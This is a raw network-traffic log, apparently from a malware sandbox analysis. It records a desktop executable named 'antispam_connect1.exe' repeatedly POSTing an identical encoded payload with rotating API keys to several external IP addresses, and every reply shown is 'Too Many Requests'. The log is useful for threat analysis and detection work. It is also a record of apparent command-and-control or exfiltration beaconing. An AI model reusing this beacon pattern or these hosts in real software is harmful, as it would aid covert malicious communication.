                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            13 | 192.168.2.5 | 49991 | 93.185.159.253 | 80 | 1600 | C:\Users\user\Desktop\antispam_connect1.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Oct 14, 2024 17:23:12.490675926 CEST | 292 | OUT | POST / HTTP/1.1
                                            Host: 93.185.159.253
                                            User-Agent: Go-http-client/1.1
                                            Content-Length: 154
                                            X-Api-Key: oz6q3zDZ
                                            Accept-Encoding: gzip
                                            Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 12 16 36 04 57 26 1e 14 0e 07 35 2c 09 04 3c 39 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2f 29 11 16 18 2e 0e 09 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 20 2c 09 30 2e 06 58 24 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 5a 3e 0f 41 06 29 28 54 5a 5f 03 44 45 45 0e 0b 5b 44 53 45 5a 58 5e 05 50 56 5b 09 0a 02 0c 50 53 09 0a 52 0c 52 54 0c 5e 02 0b 50 57 0c 0c 53 5d 05 06 5f 4c 1b
                                            Data Ascii: M*L\K6W&5,<9DEE2MTD/).ACL>K]A ,0.X$DEE1AULVZ>A)(TZ_DEE[DSEZX^PV[PSRRT^PWS]_L
                                            Oct 14, 2024 17:23:13.182403088 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
                                            Content-Type: text/plain; charset=utf-8
                                            X-Content-Type-Options: nosniff
                                            Date: Mon, 14 Oct 2024 15:23:13 GMT
                                            Content-Length: 18
                                            Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                            Data Ascii: Too many requests


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            14 | 192.168.2.5 | 49992 | 91.212.166.91 | 80 | 1600 | C:\Users\user\Desktop\antispam_connect1.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Oct 14, 2024 17:23:13.204442978 CEST | 291 | OUT | POST / HTTP/1.1
                                            Host: 91.212.166.91
                                            User-Agent: Go-http-client/1.1
                                            Content-Length: 154
                                            X-Api-Key: HCTYWzVO
                                            Accept-Encoding: gzip
                                            Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 12 16 36 04 57 26 1e 14 0e 07 35 2c 09 04 3c 39 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2f 29 11 16 18 2e 0e 09 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 20 2c 09 30 2e 06 58 24 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 5a 3e 0f 41 06 29 28 54 5a 5f 03 44 45 45 0e 0b 5b 44 53 45 5a 58 5e 05 50 56 5b 09 0a 02 0c 50 53 09 0a 52 0c 52 54 0c 5e 02 0b 50 57 0c 0c 53 5d 05 06 5f 4c 1b
                                            Data Ascii: M*L\K6W&5,<9DEE2MTD/).ACL>K]A ,0.X$DEE1AULVZ>A)(TZ_DEE[DSEZX^PV[PSRRT^PWS]_L
                                            Oct 14, 2024 17:23:13.908325911 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
                                            Content-Type: text/plain; charset=utf-8
                                            X-Content-Type-Options: nosniff
                                            Date: Mon, 14 Oct 2024 15:23:13 GMT
                                            Content-Length: 18
                                            Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                            Data Ascii: Too many requests


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            15 | 192.168.2.5 | 49993 | 188.130.206.243 | 80 | 1600 | C:\Users\user\Desktop\antispam_connect1.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Oct 14, 2024 17:23:13.930579901 CEST | 293 | OUT | POST / HTTP/1.1
                                            Host: 188.130.206.243
                                            User-Agent: Go-http-client/1.1
                                            Content-Length: 154
                                            X-Api-Key: uDHOt1xZ
                                            Accept-Encoding: gzip
                                            Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 12 16 36 04 57 26 1e 14 0e 07 35 2c 09 04 3c 39 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2f 29 11 16 18 2e 0e 09 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 20 2c 09 30 2e 06 58 24 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 5a 3e 0f 41 06 29 28 54 5a 5f 03 44 45 45 0e 0b 5b 44 53 45 5a 58 5e 05 50 56 5b 09 0a 02 0c 50 53 09 0a 52 0c 52 54 0c 5e 02 0b 50 57 0c 0c 53 5d 05 06 5f 4c 1b
                                            Data Ascii: M*L\K6W&5,<9DEE2MTD/).ACL>K]A ,0.X$DEE1AULVZ>A)(TZ_DEE[DSEZX^PV[PSRRT^PWS]_L
                                            Oct 14, 2024 17:23:15.151458025 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
                                            Content-Type: text/plain; charset=utf-8
                                            X-Content-Type-Options: nosniff
                                            Date: Mon, 14 Oct 2024 15:23:14 GMT
                                            Content-Length: 18
                                            Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                            Data Ascii: Too many requests
                                            Oct 14, 2024 17:23:15.153148890 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
                                            Content-Type: text/plain; charset=utf-8
                                            X-Content-Type-Options: nosniff
                                            Date: Mon, 14 Oct 2024 15:23:14 GMT
                                            Content-Length: 18
                                            Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                            Data Ascii: Too many requests


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            16 | 192.168.2.5 | 49994 | 46.8.232.106 | 80 | 1900 | C:\Users\user\Desktop\antispam_connect1.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Oct 14, 2024 17:23:19.409221888 CEST | 290 | OUT | POST / HTTP/1.1
                                            Host: 46.8.232.106
                                            User-Agent: Go-http-client/1.1
                                            Content-Length: 154
                                            X-Api-Key: M1HvB989
                                            Accept-Encoding: gzip
                                            Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 12 16 36 04 57 26 1e 14 0e 07 35 2c 09 04 3c 39 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2f 29 11 16 18 2e 0e 09 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 20 2c 09 30 2e 06 58 24 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 5a 3e 0f 41 06 29 28 54 5a 5f 03 44 45 45 0e 0b 5b 44 53 45 5a 58 5e 05 50 56 5b 09 0a 02 0c 50 53 09 0a 52 0c 52 54 0c 5e 02 0b 50 57 0c 0c 53 5d 05 06 5f 4c 1b
                                            Data Ascii: M*L\K6W&5,<9DEE2MTD/).ACL>K]A ,0.X$DEE1AULVZ>A)(TZ_DEE[DSEZX^PV[PSRRT^PWS]_L
                                            Oct 14, 2024 17:23:20.160610914 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
                                            Content-Type: text/plain; charset=utf-8
                                            X-Content-Type-Options: nosniff
                                            Date: Mon, 14 Oct 2024 15:23:19 GMT
                                            Content-Length: 18
                                            Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                            Data Ascii: Too many requests


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            17 | 192.168.2.5 | 49995 | 46.8.236.61 | 80 | 1900 | C:\Users\user\Desktop\antispam_connect1.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Oct 14, 2024 17:23:20.182188988 CEST | 289 | OUT | POST / HTTP/1.1
                                            Host: 46.8.236.61
                                            User-Agent: Go-http-client/1.1
                                            Content-Length: 154
                                            X-Api-Key: m95WCTzh
                                            Accept-Encoding: gzip
                                            Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 12 16 36 04 57 26 1e 14 0e 07 35 2c 09 04 3c 39 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2f 29 11 16 18 2e 0e 09 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 20 2c 09 30 2e 06 58 24 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 5a 3e 0f 41 06 29 28 54 5a 5f 03 44 45 45 0e 0b 5b 44 53 45 5a 58 5e 05 50 56 5b 09 0a 02 0c 50 53 09 0a 52 0c 52 54 0c 5e 02 0b 50 57 0c 0c 53 5d 05 06 5f 4c 1b
                                            Data Ascii: M*L\K6W&5,<9DEE2MTD/).ACL>K]A ,0.X$DEE1AULVZ>A)(TZ_DEE[DSEZX^PV[PSRRT^PWS]_L
                                            Oct 14, 2024 17:23:20.866760969 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
                                            Content-Type: text/plain; charset=utf-8
                                            X-Content-Type-Options: nosniff
                                            Date: Mon, 14 Oct 2024 15:23:20 GMT
                                            Content-Length: 18
                                            Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                            Data Ascii: Too many requests


                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                            18 | 192.168.2.5 | 49996 | 93.185.159.253 | 80 | 1900 | C:\Users\user\Desktop\antispam_connect1.exe
                                            Timestamp | Bytes transferred | Direction | Data
                                            Oct 14, 2024 17:23:20.889127970 CEST | 292 | OUT | POST / HTTP/1.1
                                            Host: 93.185.159.253
                                            User-Agent: Go-http-client/1.1
                                            Content-Length: 154
                                            X-Api-Key: t3SKYf1I
                                            Accept-Encoding: gzip
                                            Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 12 16 36 04 57 26 1e 14 0e 07 35 2c 09 04 3c 39 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2f 29 11 16 18 2e 0e 09 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 20 2c 09 30 2e 06 58 24 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 5a 3e 0f 41 06 29 28 54 5a 5f 03 44 45 45 0e 0b 5b 44 53 45 5a 58 5e 05 50 56 5b 09 0a 02 0c 50 53 09 0a 52 0c 52 54 0c 5e 02 0b 50 57 0c 0c 53 5d 05 06 5f 4c 1b
                                            Data Ascii: M*L\K6W&5,<9DEE2MTD/).ACL>K]A ,0.X$DEE1AULVZ>A)(TZ_DEE[DSEZX^PV[PSRRT^PWS]_L
                                            Oct 14, 2024 17:23:21.588639975 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
                                            Content-Type: text/plain; charset=utf-8
                                            X-Content-Type-Options: nosniff
                                            Date: Mon, 14 Oct 2024 15:23:21 GMT
                                            Content-Length: 18
                                            Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                            Data Ascii: Too many requests


                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                             19 | 192.168.2.5 | 49997 | 91.212.166.91 | 80 | 1900 | C:\Users\user\Desktop\antispam_connect1.exe
                                             Timestamp | Bytes transferred | Direction | Data
                                             Oct 14, 2024 17:23:21.609951973 CEST | 291 | OUT | POST / HTTP/1.1
                                            Host: 91.212.166.91
                                            User-Agent: Go-http-client/1.1
                                            Content-Length: 154
                                            X-Api-Key: 8VnjTmTA
                                            Accept-Encoding: gzip
                                            Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 12 16 36 04 57 26 1e 14 0e 07 35 2c 09 04 3c 39 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2f 29 11 16 18 2e 0e 09 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 20 2c 09 30 2e 06 58 24 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 5a 3e 0f 41 06 29 28 54 5a 5f 03 44 45 45 0e 0b 5b 44 53 45 5a 58 5e 05 50 56 5b 09 0a 02 0c 50 53 09 0a 52 0c 52 54 0c 5e 02 0b 50 57 0c 0c 53 5d 05 06 5f 4c 1b
                                            Data Ascii: M*L\K6W&5,<9DEE2MTD/).ACL>K]A ,0.X$DEE1AULVZ>A)(TZ_DEE[DSEZX^PV[PSRRT^PWS]_L
                                             Oct 14, 2024 17:23:22.302325964 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
                                            Content-Type: text/plain; charset=utf-8
                                            X-Content-Type-Options: nosniff
                                            Date: Mon, 14 Oct 2024 15:23:22 GMT
                                            Content-Length: 18
                                            Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                            Data Ascii: Too many requests


                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                             20 | 192.168.2.5 | 49998 | 188.130.206.243 | 80 | 1900 | C:\Users\user\Desktop\antispam_connect1.exe
                                             Timestamp | Bytes transferred | Direction | Data
                                             Oct 14, 2024 17:23:22.325318098 CEST | 293 | OUT | POST / HTTP/1.1
                                            Host: 188.130.206.243
                                            User-Agent: Go-http-client/1.1
                                            Content-Length: 154
                                            X-Api-Key: hxPq0fH2
                                            Accept-Encoding: gzip
                                            Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 12 16 36 04 57 26 1e 14 0e 07 35 2c 09 04 3c 39 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2f 29 11 16 18 2e 0e 09 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 20 2c 09 30 2e 06 58 24 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 5a 3e 0f 41 06 29 28 54 5a 5f 03 44 45 45 0e 0b 5b 44 53 45 5a 58 5e 05 50 56 5b 09 0a 02 0c 50 53 09 0a 52 0c 52 54 0c 5e 02 0b 50 57 0c 0c 53 5d 05 06 5f 4c 1b
                                            Data Ascii: M*L\K6W&5,<9DEE2MTD/).ACL>K]A ,0.X$DEE1AULVZ>A)(TZ_DEE[DSEZX^PV[PSRRT^PWS]_L
                                             Oct 14, 2024 17:23:23.380269051 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
                                            Content-Type: text/plain; charset=utf-8
                                            X-Content-Type-Options: nosniff
                                            Date: Mon, 14 Oct 2024 15:23:23 GMT
                                            Content-Length: 18
                                            Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                            Data Ascii: Too many requests
                                             Oct 14, 2024 17:23:23.381438017 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
                                            Content-Type: text/plain; charset=utf-8
                                            X-Content-Type-Options: nosniff
                                            Date: Mon, 14 Oct 2024 15:23:23 GMT
                                            Content-Length: 18
                                            Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                            Data Ascii: Too many requests


                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                             21 | 192.168.2.5 | 49999 | 46.8.232.106 | 80 | 1600 | C:\Users\user\Desktop\antispam_connect1.exe
                                             Timestamp | Bytes transferred | Direction | Data
                                             Oct 14, 2024 17:23:45.183733940 CEST | 290 | OUT | POST / HTTP/1.1
                                            Host: 46.8.232.106
                                            User-Agent: Go-http-client/1.1
                                            Content-Length: 154
                                            X-Api-Key: bqCgchjG
                                            Accept-Encoding: gzip
                                            Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 12 16 36 04 57 26 1e 14 0e 07 35 2c 09 04 3c 39 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2f 29 11 16 18 2e 0e 09 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 20 2c 09 30 2e 06 58 24 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 5a 3e 0f 41 06 29 28 54 5a 5f 03 44 45 45 0e 0b 5b 44 53 45 5a 58 5e 05 50 56 5b 09 0a 02 0c 50 53 09 0a 52 0c 52 54 0c 5e 02 0b 50 57 0c 0c 53 5d 05 06 5f 4c 1b
                                            Data Ascii: M*L\K6W&5,<9DEE2MTD/).ACL>K]A ,0.X$DEE1AULVZ>A)(TZ_DEE[DSEZX^PV[PSRRT^PWS]_L
                                             Oct 14, 2024 17:23:45.849822998 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
                                            Content-Type: text/plain; charset=utf-8
                                            X-Content-Type-Options: nosniff
                                            Date: Mon, 14 Oct 2024 15:23:45 GMT
                                            Content-Length: 18
                                            Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                            Data Ascii: Too many requests


                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                             22 | 192.168.2.5 | 50000 | 46.8.236.61 | 80 | 1600 | C:\Users\user\Desktop\antispam_connect1.exe
                                             Timestamp | Bytes transferred | Direction | Data
                                             Oct 14, 2024 17:23:45.875452995 CEST | 289 | OUT | POST / HTTP/1.1
                                            Host: 46.8.236.61
                                            User-Agent: Go-http-client/1.1
                                            Content-Length: 154
                                            X-Api-Key: 3MeojUFr
                                            Accept-Encoding: gzip
                                            Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 12 16 36 04 57 26 1e 14 0e 07 35 2c 09 04 3c 39 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2f 29 11 16 18 2e 0e 09 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 20 2c 09 30 2e 06 58 24 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 5a 3e 0f 41 06 29 28 54 5a 5f 03 44 45 45 0e 0b 5b 44 53 45 5a 58 5e 05 50 56 5b 09 0a 02 0c 50 53 09 0a 52 0c 52 54 0c 5e 02 0b 50 57 0c 0c 53 5d 05 06 5f 4c 1b
                                            Data Ascii: M*L\K6W&5,<9DEE2MTD/).ACL>K]A ,0.X$DEE1AULVZ>A)(TZ_DEE[DSEZX^PV[PSRRT^PWS]_L
                                             Oct 14, 2024 17:23:46.663028002 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
                                            Content-Type: text/plain; charset=utf-8
                                            X-Content-Type-Options: nosniff
                                            Date: Mon, 14 Oct 2024 15:23:46 GMT
                                            Content-Length: 18
                                            Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                            Data Ascii: Too many requests


                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                             23 | 192.168.2.5 | 50001 | 93.185.159.253 | 80 | 1600 | C:\Users\user\Desktop\antispam_connect1.exe
                                             Timestamp | Bytes transferred | Direction | Data
                                             Oct 14, 2024 17:23:46.690642118 CEST | 292 | OUT | POST / HTTP/1.1
                                            Host: 93.185.159.253
                                            User-Agent: Go-http-client/1.1
                                            Content-Length: 154
                                            X-Api-Key: SS3XET1Y
                                            Accept-Encoding: gzip
                                            Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 12 16 36 04 57 26 1e 14 0e 07 35 2c 09 04 3c 39 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2f 29 11 16 18 2e 0e 09 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 20 2c 09 30 2e 06 58 24 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 5a 3e 0f 41 06 29 28 54 5a 5f 03 44 45 45 0e 0b 5b 44 53 45 5a 58 5e 05 50 56 5b 09 0a 02 0c 50 53 09 0a 52 0c 52 54 0c 5e 02 0b 50 57 0c 0c 53 5d 05 06 5f 4c 1b
                                            Data Ascii: M*L\K6W&5,<9DEE2MTD/).ACL>K]A ,0.X$DEE1AULVZ>A)(TZ_DEE[DSEZX^PV[PSRRT^PWS]_L
                                             Oct 14, 2024 17:23:47.399589062 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
                                            Content-Type: text/plain; charset=utf-8
                                            X-Content-Type-Options: nosniff
                                            Date: Mon, 14 Oct 2024 15:23:47 GMT
                                            Content-Length: 18
                                            Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                            Data Ascii: Too many requests


                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                             24 | 192.168.2.5 | 50002 | 91.212.166.91 | 80 | 1600 | C:\Users\user\Desktop\antispam_connect1.exe
                                             Timestamp | Bytes transferred | Direction | Data
                                             Oct 14, 2024 17:23:47.421597004 CEST | 291 | OUT | POST / HTTP/1.1
                                            Host: 91.212.166.91
                                            User-Agent: Go-http-client/1.1
                                            Content-Length: 154
                                            X-Api-Key: Ig3qaanA
                                            Accept-Encoding: gzip
                                            Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 12 16 36 04 57 26 1e 14 0e 07 35 2c 09 04 3c 39 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2f 29 11 16 18 2e 0e 09 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 20 2c 09 30 2e 06 58 24 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 5a 3e 0f 41 06 29 28 54 5a 5f 03 44 45 45 0e 0b 5b 44 53 45 5a 58 5e 05 50 56 5b 09 0a 02 0c 50 53 09 0a 52 0c 52 54 0c 5e 02 0b 50 57 0c 0c 53 5d 05 06 5f 4c 1b
                                            Data Ascii: M*L\K6W&5,<9DEE2MTD/).ACL>K]A ,0.X$DEE1AULVZ>A)(TZ_DEE[DSEZX^PV[PSRRT^PWS]_L
                                             Oct 14, 2024 17:23:48.151674986 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
                                            Content-Type: text/plain; charset=utf-8
                                            X-Content-Type-Options: nosniff
                                            Date: Mon, 14 Oct 2024 15:23:48 GMT
                                            Content-Length: 18
                                            Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                            Data Ascii: Too many requests


                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                             25 | 192.168.2.5 | 50003 | 188.130.206.243 | 80 | 1600 | C:\Users\user\Desktop\antispam_connect1.exe
                                             Timestamp | Bytes transferred | Direction | Data
                                             Oct 14, 2024 17:23:48.173584938 CEST | 293 | OUT | POST / HTTP/1.1
                                            Host: 188.130.206.243
                                            User-Agent: Go-http-client/1.1
                                            Content-Length: 154
                                            X-Api-Key: MQtwlyZI
                                            Accept-Encoding: gzip
                                            Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 12 16 36 04 57 26 1e 14 0e 07 35 2c 09 04 3c 39 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2f 29 11 16 18 2e 0e 09 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 20 2c 09 30 2e 06 58 24 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 5a 3e 0f 41 06 29 28 54 5a 5f 03 44 45 45 0e 0b 5b 44 53 45 5a 58 5e 05 50 56 5b 09 0a 02 0c 50 53 09 0a 52 0c 52 54 0c 5e 02 0b 50 57 0c 0c 53 5d 05 06 5f 4c 1b
                                            Data Ascii: M*L\K6W&5,<9DEE2MTD/).ACL>K]A ,0.X$DEE1AULVZ>A)(TZ_DEE[DSEZX^PV[PSRRT^PWS]_L
                                             Oct 14, 2024 17:23:49.273998022 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
                                            Content-Type: text/plain; charset=utf-8
                                            X-Content-Type-Options: nosniff
                                            Date: Mon, 14 Oct 2024 15:23:49 GMT
                                            Content-Length: 18
                                            Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                            Data Ascii: Too many requests


                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                             26 | 192.168.2.5 | 50004 | 46.8.232.106 | 80 | 1900 | C:\Users\user\Desktop\antispam_connect1.exe
                                             Timestamp | Bytes transferred | Direction | Data
                                             Oct 14, 2024 17:23:53.403402090 CEST | 290 | OUT | POST / HTTP/1.1
                                            Host: 46.8.232.106
                                            User-Agent: Go-http-client/1.1
                                            Content-Length: 154
                                            X-Api-Key: 512BqIU7
                                            Accept-Encoding: gzip
                                            Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 12 16 36 04 57 26 1e 14 0e 07 35 2c 09 04 3c 39 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2f 29 11 16 18 2e 0e 09 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 20 2c 09 30 2e 06 58 24 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 5a 3e 0f 41 06 29 28 54 5a 5f 03 44 45 45 0e 0b 5b 44 53 45 5a 58 5e 05 50 56 5b 09 0a 02 0c 50 53 09 0a 52 0c 52 54 0c 5e 02 0b 50 57 0c 0c 53 5d 05 06 5f 4c 1b
                                            Data Ascii: M*L\K6W&5,<9DEE2MTD/).ACL>K]A ,0.X$DEE1AULVZ>A)(TZ_DEE[DSEZX^PV[PSRRT^PWS]_L
                                             Oct 14, 2024 17:23:54.068721056 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
                                            Content-Type: text/plain; charset=utf-8
                                            X-Content-Type-Options: nosniff
                                            Date: Mon, 14 Oct 2024 15:23:53 GMT
                                            Content-Length: 18
                                            Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                            Data Ascii: Too many requests


                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                             27 | 192.168.2.5 | 50005 | 46.8.236.61 | 80 | 1900 | C:\Users\user\Desktop\antispam_connect1.exe
                                             Timestamp | Bytes transferred | Direction | Data
                                             Oct 14, 2024 17:23:54.091245890 CEST | 289 | OUT | POST / HTTP/1.1
                                            Host: 46.8.236.61
                                            User-Agent: Go-http-client/1.1
                                            Content-Length: 154
                                            X-Api-Key: WfMAsHSr
                                            Accept-Encoding: gzip
                                            Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 12 16 36 04 57 26 1e 14 0e 07 35 2c 09 04 3c 39 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2f 29 11 16 18 2e 0e 09 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 20 2c 09 30 2e 06 58 24 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 5a 3e 0f 41 06 29 28 54 5a 5f 03 44 45 45 0e 0b 5b 44 53 45 5a 58 5e 05 50 56 5b 09 0a 02 0c 50 53 09 0a 52 0c 52 54 0c 5e 02 0b 50 57 0c 0c 53 5d 05 06 5f 4c 1b
                                            Data Ascii: M*L\K6W&5,<9DEE2MTD/).ACL>K]A ,0.X$DEE1AULVZ>A)(TZ_DEE[DSEZX^PV[PSRRT^PWS]_L
                                             Oct 14, 2024 17:23:54.790015936 CEST | 183 | IN | HTTP/1.1 429 Too Many Requests
                                            Content-Type: text/plain; charset=utf-8
                                            X-Content-Type-Options: nosniff
                                            Date: Mon, 14 Oct 2024 15:23:54 GMT
                                            Content-Length: 18
                                            Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a
                                            Data Ascii: Too many requests


                                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                             28 | 192.168.2.5 | 50006 | 93.185.159.253 | 80 | 1900 | C:\Users\user\Desktop\antispam_connect1.exe
                                             Timestamp | Bytes transferred | Direction | Data
                                             Oct 14, 2024 17:23:54.817363024 CEST | 292 | OUT | POST / HTTP/1.1
                                            Host: 93.185.159.253
                                            User-Agent: Go-http-client/1.1
                                            Content-Length: 154
                                            X-Api-Key: kBrSLuLi
                                            Accept-Encoding: gzip
                                            Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 12 16 36 04 57 26 1e 14 0e 07 35 2c 09 04 3c 39 44 45 45 13 1d 01 1e 10 32 10 0a 1c 08 08 0a 06 4d 54 44 2f 29 11 16 18 2e 0e 09 41 43 4c 16 1b 08 1b 16 3e 07 1a 14 14 00 1c 02 4b 5d 41 20 2c 09 30 2e 06 58 24 44 45 45 01 1a 07 0a 0d 31 06 1d 1d 0f 06 09 41 55 4c 56 5a 3e 0f 41 06 29 28 54 5a 5f 03 44 45 45 0e 0b 5b 44 53 45 5a 58 5e 05 50 56 5b 09 0a 02 0c 50 53 09 0a 52 0c 52 54 0c 5e 02 0b 50 57 0c 0c 53 5d 05 06 5f 4c 1b
                                            Data Ascii: M*L\K6W&5,<9DEE2MTD/).ACL>K]A ,0.X$DEE1AULVZ>A)(TZ_DEE[DSEZX^PV[PSRRT^PWS]_L
